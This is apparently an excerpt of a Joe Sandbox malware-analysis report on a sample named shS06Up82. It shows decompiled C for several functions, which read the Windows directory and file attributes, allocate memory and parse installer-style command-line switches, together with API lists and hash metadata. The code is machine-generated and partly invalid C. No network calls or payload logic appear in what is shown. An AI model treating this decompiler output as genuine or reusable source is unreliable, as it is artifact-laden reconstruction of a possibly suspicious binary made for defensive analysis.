                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E003E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003E623F
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: e2cc64c89a103b6409a5905022ff276f7dc4084a7ac9a96e8e10570a7d6793e8
                                                                                                                                                                                                      • Instruction ID: 193334d4c2f2397c09b0737564ee8052f4d978c8d7da4e9fa06a0c9dd4c2611c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2cc64c89a103b6409a5905022ff276f7dc4084a7ac9a96e8e10570a7d6793e8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCF0B470704258ABD761EB758D43BBE36ACDB54340F40066ABA85DE1C2DD749D448650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0x3e8d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0x3e8d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0x3e8d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,003E4FA1,00000000), ref: 003E4B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                      • Instruction ID: 7b24c564b8126aed72475650f18eb86eb6e35d900a4051cc468051f7bace89ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F01231D00B9D9E4773DF3ACC10653BBE8BA953603100B2EA4AED21D0DB31A852EB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E66AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,003E4777,?,003E4E38,?), ref: 003E66B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x003e4caa
                                                                                                                                                                                                      0x003e4cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 003E4CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x003e4cc8
                                                                                                                                                                                                      0x003e4ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E003E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E003E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E003E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E003E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E003E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E003E44B9(0, 0x521, 0x3e1140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0x3e8588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                      															if(E003E667F(_t215, _t205) == 0) {
                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                      																if(E003E667F(_t215, _t206) == 0) {
                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                      																	if(E003E5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                      																		E003E1680(0x3e8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                      																	if(E003E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                      																if(E003E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *0x3e8a24 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                      															if(E003E5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                      																_t218 = 0x3e8b3e;
                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                      																	_t218 = 0x3e8a3a;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																E003E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                      																E003E658A(_t218, 0x104, 0x3e1140);
                                                                                                                                                                                                      																if(E003E31E0(_t218) != 0) {
                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                      																			 *0x3e8a2c = 1;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                      																				 *0x3e8a30 = 1;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                      																					 *0x3e8a34 = 1;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															 *0x3e8a2c = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0x3e8a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0x3e9a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0x3e9a2c =  *0x3e9a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0x3e8d48 =  *0x3e8d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0x3e9a2c =  *0x3e9a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0x3e9a2c =  *0x3e9a2c & 0xfffffffe;
